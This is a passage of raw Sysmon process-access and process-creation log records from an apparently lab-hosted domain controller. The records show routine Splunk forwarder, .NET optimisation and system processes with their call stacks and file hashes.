Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-91FC-6005-5F03-00000000A301}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FC-6005-5E03-00000000A301}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.417{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FC-6005-5E03-00000000A301}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.417{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FC-6005-5E03-00000000A301}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.354{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FC-6005-5D03-00000000A301}1068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.338{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FC-6005-5D03-00000000A301}1068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.338{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FC-6005-5D03-00000000A301}1068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.250{59A5CD1D-91FC-6005-5B03-00000000A301}47721336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.250{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FC-6005-5C03-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.249{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FC-6005-5C03-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.248{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FC-6005-5C03-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91FC-6005-5B03-00000000A301}4772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FC-6005-5B03-00000000A301}4772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91FC-6005-5B03-00000000A301}4772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-91FC-6005-5B03-00000000A301}4772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 